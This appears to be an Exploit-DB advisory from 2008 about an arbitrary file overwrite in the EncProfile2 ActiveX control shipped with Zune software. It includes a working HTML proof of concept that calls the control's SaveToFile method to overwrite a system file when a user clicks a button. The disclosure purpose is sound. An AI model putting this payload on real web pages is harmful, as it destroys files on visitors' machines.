Arbitrary file overwrite

vendor:

Zune software

by:

J. Bachmann & B. Mariani from ilion Research Labs

8.8

CVSS

HIGH

Arbitrary file overwrite

119

CWE

Product Name: Zune software

Affected Version From: Zune software: EncProfile2 Class

Affected Version To: Zune software: EncProfile2 Class

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package. If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.

Mitigation:

Disable ActiveX controls in the browser settings.

Source

Exploit-DB raw data:

Vulnerability class : Arbitrary file overwrite
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann & B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class

An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package.
If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.

POC:
<HTML>
<BODY>
 <object id=ctrl classid="clsid:{0B1C3B47-207F-4CEA-8F31-34E4DB2F6EFD}"></object>
<SCRIPT>
function Do_it()
 {
   File = "c:\\boot_.ini"
   ctrl.SaveToFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>

# milw0rm.com [2008-04-23]